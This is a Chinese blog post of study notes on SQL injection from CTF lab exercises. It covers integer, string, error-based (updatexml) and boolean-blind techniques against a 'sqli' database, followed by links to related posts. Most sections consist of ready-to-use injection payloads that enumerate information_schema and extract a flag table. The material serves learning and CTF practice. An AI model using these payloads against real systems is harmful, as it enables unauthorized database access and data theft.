sql注入

最新推荐文章于 2024-07-29 16:48:37 发布
最新推荐文章于 2024-07-29 16:48:37 发布
阅读量370 收藏 4
点赞数 2
文章标签: sql 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Gagatj_/article/details/130346539
版权

学习内容:

  1. 整数型注入
  2. 字符型注入
  3. 报错注入
  4. 布尔盲注

学习记录:

相关概念记忆:

information_schema:存储着mysql中所以数据库,表,列,索引等的元数据信息

information_schema.tables:存储着关于数据库中的详细信息

information_schema.columns:存储着关于数据库中所有表的列的详细信息

table_name:存储着数据库中所以表的名称

table_schema:mysql中information_schema.tables表的一个列,存储着数据库中所有表所属的数据库名称

1.整数型注入

思路如下:

  • 判断:输入1’#,‘单引号让字符型查询语句闭合,#将后面的语句注释掉,若为字符型查询语句应有回显,此处没有,判断为整数型注入。
  • 万能公式的理解:分别输入1 and 1=11 and 1=2,其中前者有回显后者无,说明and后面的语句被执行了,存在sql注入漏洞
  • order by:可以按照指定的列或表达式对结果集排序,order by 1,2,3,其中的1,2并不是列名,而是按照列表的第一列和第二列排序,根据是否回显判断这个表的列数
  • union select:联合查询注入,union用于合并两个或多个select语句(注:union内的每个select语句必须用于相同数量的列
  • 判断显示位:-1 union select 1,2  其中id=-1为了让只得到select 1,2的结果,然后判断出2这个位置可以被代替
  • 查询数据库的名字:-1 union select 1,database()
  • 查询数据库中的表:-1 union select 1,table_name from information_schema.tables where table_schema='sqli'     或者   -1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
  • 查flag表中的字段名(列名):-1 union select 1,column_name from information_schema.columns where table_schema='sqli' and table_name='flag'
  • 查相应字段中的所有数据: -1 union select 1,flag from flag

2.字符型注入

思路如下:

1.判断: 1' 报错  1‘ and 1=1 报错  1’ and 1=1#(注释掉后边的引号)成功执行  1‘ and 1=2#报错说明and后面语句被执行了

2. order by: 1' order by 3# 超过它的字段数就会报错

3. 判断显示的信息是第几列的信息 -1' union select 1,2#   (data =2)

4.查询数据库的名字 -1‘ union select 1,database()#

5查询数据库中的表 -1' union select 1,table_name from information_schema.tables where table_schema='sqli'#

6.查询表中的字段 -1' union select 1,column_name from information_schema.columns where table_schema='sqli' and table_name='flag'#

7.查询字段中的所有数据 -1' union select 1,flag from flag#

注意一定区分英文和中文的引号,中文的引号会报错

3.报错注入

相关知识记忆:

updatexml()函数   updatexml(xml_doument,XPath_string,new_value)

只需满足第二个参数符合XPath语句

思路如下:

1.查询数据库的名称

 2.查询数据库中的表

 报错显示:查询回显超过一行

需要使用limit 函数: limit 0,1 表示从表中的第0个数据开始,只读取1个

1 and updatexml(1,concat(0x7e,(select table_name from information _schema.tables where table_schema='sqli' limit 0,1)),3)

3.查询表中的字段(列)

1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1)),2)

4.查询字段中的所有数据

1 and updatexml(1,concat(0x7e,(select flag from flag)),2)

数据显示不全,需要用left和right函数

1 and updatexml(1,concat(0x7e,left((select group_concat(flag) from flag),16)),2)

1 and updatexml(1,concat(0x7e,right((select group_concat(flag) from flag),16)),2)

表示分别返回flag字符串中左边的16个字符串和右边的字符串

注意:

flag的长度一般在4-30之间

0x7e 等价于 ~

concat():拼接特殊符号和查询结果

updatexml和extractvalue最大只能爆出32位的值

4.布尔盲注

布尔盲注一般在页面只会显示正确和错误两种显示

先是进行手动注入

1.查数据库的名称

length(str) //返回str字符串的长度。
1 and length(database())=3 //判断数据库名字的长度是否为4
1 and length(database())>2 //判断数据库名称长度是否大于2

substr(str,pos,len)  //将str从下标为pos的位置开始截取len长度的字符                                               1 and ascii(substr(database(),1,1))=n  获取数据库的第一个字符                                                       1 and ascii(substr(database(),1,1))=n   获取数据库的第二个字符

2.查数据库中的表

猜第一张表的第一个字符

1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>110

猜第一张表的第二个字符

1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>110

类推再去猜第二张表得到有效的表名flag

3.查表中的字段数

1 and (select count(column_name) from information_schema.columns where table_name='flag') = n

4.查表中的字段

1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1)>110

5.查数据

手动注入很复杂跟着网上教程在kali中使用sqlmap工具

1.查询数据库

看到返回结果得知下一步要查找sqli这个数据库

 2.查询数据库中的表

可以查找到有两种表,其中flag为有效的

 3.查找flag表中的字段

最后得到flag值

Gaga23333
关注
SQL 整数形注入
MZa1213123的博客
03-02 2693
CTFHub SQL 整数型注入 先 and 1=1 有回显 接着 and 1=2 无回显也就错误页面 判断有 SQL 注入 order by x 爆出几个字段 order by 3 无回显 证明只有两个字段 union 联合查询 常用函数 user() database() session_usr() @@version @@basedir @@datadir @@version_compile_os 得到数据库名后 接着继续爆出该数据库的表名(奇怪.
sql注入整数型注入
2401_82760239的博客
03-29 1135
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。SQL注入其实就是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说,就是数据「越俎代庖」做了代码才能干的事情。这个问题的来源是,SQL数据库的操作是通过SQL语句来执行的,而无论是执行代码还是数据项都必须写在SQL语句之中,这就导致如果我们在数据项中加入了某些SQL语句关键字(比如说SELECT、DROP等等),这些关键字就很可能在数据库写入或读取数据时得到执行。
整数型SQL注入
最新发布
qq_69100706的博客
07-29 228
在CTF(Capture The Flag)竞赛中,整数型SQL注入是一种常见的挑战类型,尤其是在Web安全类的任务中。整数型注入发生在应用程序接受数字输入时,没有正确地验证或清理输入数据,导致恶意构造的数字可以被解释为SQL语句的一部分,从而执行额外的数据库查询。
SQL注入整数型注入
noob_3000的博客
08-07 2951
CTFHUB整数型SQL注入
CTFHUB - SQL注入-整数型和字符型注入
m0_64180167的博客
11-28 2438
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
CTFHub技能书解题笔记-SQL注入-整数型注入
qq_43006864的博客
12-21 2210
一、到了SQL注入了,这里的话,我建议大家手动注入,要是不熟悉sqlmap的话,建议分别做一遍,这里我附上手动注入的方式。 打开题目 很清楚的告诉我们,整数型注入,还告诉我们输个1试试。 看红字部分。噢哟,直接sql语句都出来了, 这个语句很简单了,大家有sql基础的都看得懂, 然后清晰了。 常规做法,下一步恒真式,and 1=1,冲! 有回显,存在注入点了。他并没有加引号,这里也不需要加--+ # 之类的,直接进行注入就行了。 我习惯再url上进行操作,大家也可以再输入框操
SQL注入原理以及Spring Boot如何防止SQL注入(含详细示例代码)
12-29
SQL注入是一种严重的安全威胁,它允许攻击者通过在应用程序的输入字段中插入恶意SQL代码来执行未经授权的数据库操作。攻击者通常寻找没有适当验证和过滤的用户输入,然后利用这些漏洞来构造能改变原始SQL语句意图的...
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册 DB2数据库SQL注入手册是指在使用DB2数据库时,如何检测和防止SQL注入攻击的一份指南。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
常规SQL注入(整型注入
hxhabcd123的博客
08-29 1530
常规SQL注入(整型注入
sql整数型/字符型 注入
qq_44985415的博客
08-29 1527
整数型注入 1.检查是否存在注入 and 1=1 返回正确 and 1=2 返回错误 2.猜出字段数 order by x(数字) 得出字段数 3.然后就是爆数据库名information schema三步 ?id=1 and 1=2 union select 1,database() 得到数据库名称sqli 4.爆表名 ?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where
sql注入(整型、字符型、报错)
Xiiaogu的博客
11-10 522
1.从1开始输入数字判断字段数,输入3时报错,说明只有两个字段。2.将1改为-1,输入-1 union select 1,2 ,观察到Data发生变化,因此显示位是Data。3.接着查询数据库名,输入-1 union select 1,group_concat(schema_name) from information_schema.schemata查出数据库名为sqli。4.接着查询数据库表名,输入。
web安全学习-------2.sql整数型注入
阿柠xn
03-10 343
这是作者遇到的一个题目,当然这个题目也很直白,整数型注入。 我们一次填入1,2,3会发现只有1和2有回显,3并没有回显。说明可以查询到的数据有两个。 接着我们测试一下数据有几列: 测试列数: GET:id=1 order by 3# POST:id=1’ order by 3# 我们可以看到3并没有回显,2的时候正常显示,所以数据一共两列。 接下来就是尝试联合查询了,记得把前面的查询数据置空...
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1376
整型SQL注入
sql初学实践1)SQL 整数型注入--wp
m0_64417923的博客
05-03 660
进入环境: 只有输入1和2有回显 接着,判断列数: 依次输入 id=1 order by 1 id=1 order by 2 id=1 order by 3 到3时,没有回显,报错,说明这时表格只有两列 下一步 取得数据库名称: 1 and 0 union select 1,database() s数据库名称为sqli 下一步 爆表名 -1 union select 1,group_concat(table_name) from informa...
ctfhub web sql注入 整数型注入(新手适用)
cuddlylm的博客
06-20 315
首先我们要判断一下 是否可以进行sql注入 and 1=1 返回正确 and 1=2 返回错误 查看题目,?id=处存在注入
SQL注入攻防深度解析
"SQL注入天书是一份详尽介绍SQL注入技术的资料,涵盖了从基础到高级的ASP注入方法和技巧,适合不同水平的读者学习。" SQL注入是一种常见的网络安全漏洞,发生在Web应用程序未能充分验证和清理用户输入时。当用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值